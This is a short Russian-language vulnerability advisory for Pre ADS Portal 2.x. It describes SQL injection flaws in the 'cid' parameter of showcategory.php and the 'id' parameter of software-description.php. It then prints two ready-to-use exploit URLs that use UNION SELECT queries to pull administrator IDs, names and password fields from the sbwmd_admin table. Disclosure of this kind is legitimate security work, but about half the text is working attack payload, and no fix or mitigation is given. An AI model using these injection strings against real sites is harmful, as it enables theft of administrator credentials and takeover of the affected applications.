Программа: Pre ADS Portal 2.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "cid" сценарием showcategory.php и в
параметре "id" сценарием software-description.php. Удаленный пользователь может
с помощью специально сформированного запроса выполнить произвольные SQL команды
в базе данных приложения.
Эксплоит:
http://[URL]/[path]/showcategory.php?cid=-1%20union%20select%201,concat
(id,0x3a,admin_name,0x3a,pwd),3,4,5,6%20from%20sbwmd_admin--
http://[URL]/[path]/software-description.php?id=-1%20union%20select%201,2,concat
(id,0x3a,admin_name,0x3a,pwd),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20
from%20sbwmd_admin--
